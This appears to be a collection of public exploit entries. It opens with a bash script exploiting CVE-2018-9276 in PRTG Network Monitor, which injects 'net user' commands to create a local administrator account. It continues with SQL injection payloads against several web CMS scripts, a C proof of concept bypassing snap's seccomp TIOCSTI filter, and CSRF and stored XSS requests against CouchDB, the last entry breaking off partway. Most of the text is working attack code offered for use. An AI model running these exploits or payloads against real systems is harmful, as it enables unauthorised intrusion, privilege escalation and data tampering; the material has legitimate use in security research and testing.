
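#!/bin/bash
# CVE-2018-9276 -- authenticated remote code execution in PRTG Network
# Monitor 18.2.38 through the bundled "Demo EXE Notification" scripts.
#
# How it works (see the Reference link below): a notification object of type
# "Execute Program" takes a free-form parameter string that PRTG hands to the
# demo OutFile.ps1 script; the string is apparently not sanitised for ';', so
# a second PowerShell command can be appended to the file path.  Testing the
# notification makes the PRTG core server run it, so the injected command
# executes with the privileges of that service (on default installs that is
# LocalSystem -- confirm on the target).
#
# Requirements: a session cookie for a PRTG user who may create and test
# notifications (the default admin account is prtgadmin/prtgadmin).
#
# Footprint left on the target, to be cleaned up after the engagement: three
# notification objects (create_file, create_user, user_admin), the file
# C:\Users\Public\tester.txt and a local administrator account 'pentest'.
echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution                [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Date: 11/03/2019                                                        [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] \e[00m"
echo -e "\e[00;32m[*] Version: 18.2.38                                                        [*] \e[00m"
echo -e "\e[00;32m[*] CVE: CVE-2018-9276                                                      [*] \e[00m"
echo -e "\e[00;32m[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\n\e[00;32m# login to the app, default creds are prtgadmin/prtgadmin. once authenticated grab your cookie and use it with the script.\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' \e[00m\n"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"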


# Print a one-line invocation example.  The -c value is the browser's whole
# Cookie header for the logged-in PRTG session; presumably only the OCTOPUS*
# cookie carries the session, the _ga/_gid/_gat entries are analytics cookies.
usage() {
  local example
  example='./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"'
  printf '\e[00;35m EXAMPLE USAGE:\e[00m\e[00;32m %s \e[00m\n\n' "$example"
}

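# Stage 1: create a notification object that runs the bundled
# "Demo EXE Notification - OutFile.bat" with C:\Users\Public\tester.txt as
# its parameter.  Nothing is injected yet -- this only makes sure the file
# the later stages name actually exists.  Reads the globals $url and $cookie.
create_file() {
  local data response
  # The body is the complete editnotification.htm form as the browser sends
  # it; everything except name_ and the "Execute Program" fields
  # (active_10/address_10/message_10) is left at its default.
  data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0"
  data+="&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0"
  data+="&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data+="&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data+="&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data+="&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data+="&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14="
  data+="&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9="
  # "Execute Program": the demo .bat receives the quoted path as its argument.
  data+="&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60"
  data+="&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data+="&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)"
  data+="&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A"
  data+="&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
  # Each header needs its own -H: previously the X-Requested-With string was
  # passed as a second URL, which curl silently failed to fetch under -s.
  # -sS keeps the progress meter off but still reports transport errors.
  response=$(curl -sS \
    -H "Referer: $url/editnotification.htm?id=new&tabid=1" \
    -H "X-Requested-With: XMLHttpRequest" \
    -X POST --data "$data" --cookie "$cookie" \
    "$url/editsettings")
  printf '%s\n' "$response"
  echo -e "\e[00;32m [*] file created \e[00m"
}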
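# Stage 1 trigger: request a "test" of every candidate notification id, which
# makes the PRTG core server run the program configured in stage 1.  The
# script never learns the id of the object it just created, so it sweeps a
# range.  The original loop built the id as the string "20$i" for i in
# 0..50 (and once as "20range"), i.e. 200-209 and 2010-2050; that set is
# kept and the gap 2000-2009 filled in.  Set NOTIFY_IDS="2042 2043" to
# override when the target numbers objects differently.  Responses are
# discarded, as before.  Reads the globals $url and $cookie.
ex_notify_1() {
  local id ids
  ids=${NOTIFY_IDS:-$(echo {200..209} {2000..2050})}
  # shellcheck disable=SC2086 -- intentional word-splitting of the id list
  for id in $ids; do
    curl -sS -o /dev/null \
      -H "Referer: $url/myaccount.htm?tabid=2" \
      -H "X-Requested-With: XMLHttpRequest" \
      -X POST --data "id=$id" --cookie "$cookie" \
      "$url/api/notificationtest.htm"
  done
  echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}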

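# Stage 2: create a notification that runs the bundled OutFile.ps1 with the
# parameter  "C:\Users\Public\tester.txt;net user pentest P3nT3st! /add".
# The ';' apparently ends the script's argument and lets PowerShell run the
# 'net user' command that follows -- this is the injection the CVE is about.
# Reads the globals $url and $cookie.
create_user() {
  local data2 response
  data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0"
  data2+="&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0"
  data2+="&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data2+="&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data2+="&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data2+="&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data2+="&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14="
  data2+="&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9="
  # "Execute Program" with the .ps1 demo script; %3B is the injected ';'.
  data2+="&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60"
  data2+="&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data2+="&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)"
  data2+="&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A"
  data2+="&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
  # Each header needs its own -H (the original passed X-Requested-With as a
  # second URL); -sS still surfaces transport errors on stderr.
  response=$(curl -sS \
    -H "Referer: $url/editnotification.htm?id=new&tabid=1" \
    -H "X-Requested-With: XMLHttpRequest" \
    -X POST --data "$data2" --cookie "$cookie" \
    "$url/editsettings")
  printf '%s\n' "$response"
  # Message now shows the password actually set (the '!' was missing).
  echo -e "\e[00;32m [*] adding a new user 'pentest' with password 'P3nT3st!' \e[00m"
}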

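# Stage 2 trigger: test every candidate notification id so the core server
# runs the OutFile.ps1 notification with the injected 'net user' command.
# The script never learns the id of the object it created, so it sweeps a
# range.  The original loop built the id as the string "20$i" for i in
# 0..50, i.e. 200-209 and 2010-2050; that set is kept and the gap 2000-2009
# filled in.  Set NOTIFY_IDS="2042 2043" to override.  Responses are
# discarded, as before.  Reads the globals $url and $cookie.
ex_notify_2() {
  local id ids
  ids=${NOTIFY_IDS:-$(echo {200..209} {2000..2050})}
  # shellcheck disable=SC2086 -- intentional word-splitting of the id list
  for id in $ids; do
    curl -sS -o /dev/null \
      -H "Referer: $url/myaccount.htm?tabid=2" \
      -H "X-Requested-With: XMLHttpRequest" \
      -X POST --data "id=$id" --cookie "$cookie" \
      "$url/api/notificationtest.htm"
  done
  echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}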

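# Stage 3: same injection as stage 2, this time appending
# "net localgroup administrators /add pentest" so the account created in
# stage 2 becomes a local administrator.  Reads the globals $url and $cookie.
add_user_admin() {
  local data3 response
  data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0"
  data3+="&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0"
  data3+="&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data3+="&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data3+="&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data3+="&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data3+="&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14="
  data3+="&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9="
  # "Execute Program" with the .ps1 demo script; %3B is the injected ';'.
  data3+="&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60"
  data3+="&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)"
  data3+="&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)"
  data3+="&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A"
  data3+="&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
  # Each header needs its own -H (the original passed X-Requested-With as a
  # second URL); -sS still surfaces transport errors on stderr.
  response=$(curl -sS \
    -H "Referer: $url/editnotification.htm?id=new&tabid=1" \
    -H "X-Requested-With: XMLHttpRequest" \
    -X POST --data "$data3" --cookie "$cookie" \
    "$url/editsettings")
  printf '%s\n' "$response"
  echo -e "\e[00;32m [*] adding a user pentest to the administrators group \e[00m"
}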

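# Stage 3 trigger: test every candidate notification id so the core server
# runs the 'net localgroup' injection, then print the completion banner.
# The script never learns the id of the object it created, so it sweeps a
# range.  The original loop built the id as the string "20$i" for i in
# 0..50, i.e. 200-209 and 2010-2050; that set is kept and the gap 2000-2009
# filled in.  Set NOTIFY_IDS="2042 2043" to override.  Responses are
# discarded, as before.  Reads the globals $url and $cookie.
ex_notify_3() {
  local id ids
  ids=${NOTIFY_IDS:-$(echo {200..209} {2000..2050})}
  # shellcheck disable=SC2086 -- intentional word-splitting of the id list
  for id in $ids; do
    curl -sS -o /dev/null \
      -H "Referer: $url/myaccount.htm?tabid=2" \
      -H "X-Requested-With: XMLHttpRequest" \
      -X POST --data "id=$id" --cookie "$cookie" \
      "$url/api/notificationtest.htm"
  done
  echo -e "\e[00;32m [*] sending notification wait....\e[00m"
  echo -e "\n\n\e[00;32m [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! \e[00m"
}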

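# --- entry point -------------------------------------------------------------
# Parse -u <base url> and -c <cookie header>, then run the three stages in
# order.  The sleeps presumably give the core server time to execute one
# notification before the next object is created.
if [[ $# -eq 0 ]]; then
  usage
  exit 0
fi

cookie=
url=
while getopts "hu:c:" option; do
  case "${option}" in
    c) cookie=${OPTARG} ;;
    h) usage; exit 0 ;;
    u) url=${OPTARG} ;;
    *) usage; exit 2 ;;
  esac
done
shift $((OPTIND - 1))

# Both values are required; fail here instead of firing requests at "" later.
if [[ -z "$url" || -z "$cookie" ]]; then
  usage
  exit 2
fi
url=${url%/}   # avoid "//editsettings" when the URL was given with a trailing slash

create_file
ex_notify_1
sleep 3
create_user
ex_notify_2
sleep 3
add_user_admin
ex_notify_3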
            
# Exploit Title: Matrimony Website Script - Multiple SQL Injection
# Date: 22.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.matri4web.com
# Demo Site: https://www.matrimonydemo.com
# Version: M-Plus
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/simplesearch_results.php
Vulnerable Parameter: txtGender (POST)
Attack Pattern:
Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/advsearch_results.php
Vulnerable Parameter: religion (POST)
Attack Pattern:
age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo

----- PoC 3 - SQLi -----

Request: http://localhost/[PATH]/specialcase_results.php
Vulnerable Parameter: Fage
Attack Pattern (the nested sleep(0) calls as written produce no measurable delay; raise them to sleep(5) to confirm the injection as time-based):
Fage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7

----- PoC 4 - SQLi -----

Request: http://localhost/[PATH]/locational_results.php
Vulnerable Parameter: cboCountry (POST)
Attack Pattern:
Fage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo

----- PoC 5 - SQLi -----

Request: http://localhost/[PATH]/registration2.php
Vulnerable Parameter: religion (POST)
Attack Pattern:
EMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1
            
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://bootstrapy.com
# Demo Site: http://bootstrapy.net/demo/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/modules/forums/forum-thread.php
Vulnerable Parameter: thread_id (POST)
Attack Pattern:
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/modules/pages/contact-submit.php
Vulnerable Parameter: subject (POST)
Attack Pattern:
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=

----- PoC 3 - SQLi -----

Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: post-id
Attack Pattern:
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1

----- PoC 4 - SQLi -----

Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: thread-id (POST)
Attack Pattern (sleep(0) as written gives no observable delay; use sleep(5) to confirm the injection as time-based):
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
            
# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)
            
/*
snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the
source code, this filter is expressed as follows:

  # TIOCSTI allows for faking input (man tty_ioctl)
  # TODO: this should be scaled back even more
  ioctl - !TIOCSTI

In the X86-64 version of the compiled seccomp filter, this results in the
following BPF bytecode:

  [...]
  0139 if nr == 0x00000010: [true +0, false +3]
  013b   if args[1].high != 0x00000000: [true +205, false +0] -> ret ALLOW (syscalls: ioctl)
  0299   if args[1].low == 0x00005412: [true +111, false +112] -> ret ERRNO
  030a   ret ALLOW (syscalls: ioctl)
  [...]

This bytecode performs a 64-bit comparison; however, the syscall entry point for
ioctl() is defined with a 32-bit command argument in the kernel:

SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
  return ksys_ioctl(fd, cmd, arg);
}

This means that setting a bit in the high half of the command parameter will
circumvent the seccomp filter while being ignored by the kernel: the filter sees
a 64-bit value that is not 0x5412 and allows it, while the kernel truncates
`cmd` to 32 bits and executes TIOCSTI anyway. A confined snap can therefore
still fake keystrokes on its controlling terminal, which is exactly what the
rule was meant to stop. The robust form of such a filter tests only the low
32 bits of args[1] for ioctl (or denies any request with the high half set),
since that is all the kernel will ever look at.

This can be tested as follows on Ubuntu 18.04. You might have to launch the
GNOME calculator once first to create the snap directory hierarchy, I'm not
sure.

====================================================================
user@ubuntu-18-04-vm:~$ cat tiocsti.c
*/

#define _GNU_SOURCE
#include <termios.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <errno.h>

/*
 * Thin wrapper over the raw ioctl syscall so that the full 64-bit request
 * word in `nr` reaches the kernel exactly as given -- the point of the test
 * is to pass a value with a bit set above bit 31, untouched by any libc
 * wrapper.  errno is cleared first so the "%m" in the caller's printf only
 * reports a failure of this call.
 *
 * Returns the raw syscall result: 0 on success, -1 with errno set on error.
 */
static int ioctl64(int fd, unsigned long nr, void *arg) {
  long rc;

  errno = 0;
  rc = syscall(__NR_ioctl, fd, nr, arg);
  return (int)rc;
}

/*
 * Issues TIOCSTI on stdin twice: once with the plain request number and once
 * with bit 32 set.  Without a confining filter both succeed, because the
 * kernel's ioctl entry point takes `cmd` as a 32-bit value; under snap's
 * seccomp filter only the high-bit variant should, which is the bypass being
 * demonstrated.  Each successful call pushes '#' into the terminal's input
 * queue, so it shows up as if typed at the prompt.
 */
int main(void) {
  char pushmeback = '#';
  const struct {
    const char *label;
    unsigned long request;
  } probes[] = {
    { "normal TIOCSTI",       TIOCSTI },
    { "high-bit-set TIOCSTI", TIOCSTI | (1UL << 32) },
  };
  size_t i;

  for (i = 0; i < sizeof probes / sizeof probes[0]; i++) {
    int res = ioctl64(0, probes[i].request, &pushmeback);
    printf("%s: %d (%m)\n", probes[i].label, res);
  }
  return 0;
}

/*
user@ubuntu-18-04-vm:~$ gcc -o tiocsti tiocsti.c -Wall
user@ubuntu-18-04-vm:~$ ./tiocsti
#normal TIOCSTI: 0 (Success)
#high-bit-set TIOCSTI: 0 (Success)
user@ubuntu-18-04-vm:~$ ##
user@ubuntu-18-04-vm:~$ cp tiocsti /home/user/snap/gnome-calculator/current/tiocsti
user@ubuntu-18-04-vm:~$ snap run --shell gnome-calculator
[...]
user@ubuntu-18-04-vm:/home/user$ cd
user@ubuntu-18-04-vm:~$ ./tiocsti
normal TIOCSTI: -1 (Operation not permitted)
#high-bit-set TIOCSTI: 0 (Success)
user@ubuntu-18-04-vm:~$ #
user@ubuntu-18-04-vm:~$ pwd
/home/user/snap/gnome-calculator/260
user@ubuntu-18-04-vm:~$ 
====================================================================
*/
            
# Exploit Title: Inout Article Base CMS - SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/
# Demo Site: http://www.inoutwebportal.com
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: p (GET)
Attack Pattern (sleep(0) as written gives no observable delay; use sleep(5) to confirm the injection as time-based):
http://localhost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: u (GET)
Attack Pattern (sleep(0) as written gives no observable delay; use sleep(5) to confirm the injection as time-based):
http://localhost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
            
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery / Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored

Reviewer note: every request below carries only a Google Analytics `_ga` cookie, no `AuthSession` cookie or `Authorization` header, and a same-origin `Origin`/`Referer`. What they demonstrate is that these endpoints accept state-changing requests without any per-request anti-CSRF token; whether a third-party page can actually replay them depends on the target running without a configured admin ("admin party") or with CORS enabled, since a cross-origin `PUT`/`DELETE` with `Content-Type: application/json` is preflighted and blocked unless CouchDB answers the preflight. Confirm both conditions on the target before rating this as exploitable from another origin.

#################################################################################

CSRF1

Create Database

PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"id":"test","name":"test"}

#################################################################################

CSRF2

Delete Database

DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################

CSRF3

Create Document

POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"testdoc":"test"}

#################################################################################

CSRF4

Create Admin

PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"password"


#################################################################################


CSRF5 & XSS1 | DOM Based & Stored - Add Option


PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"test"

#################################################################################

CSRF6 & XSS2 | DOM Based & Stored - Delete Option

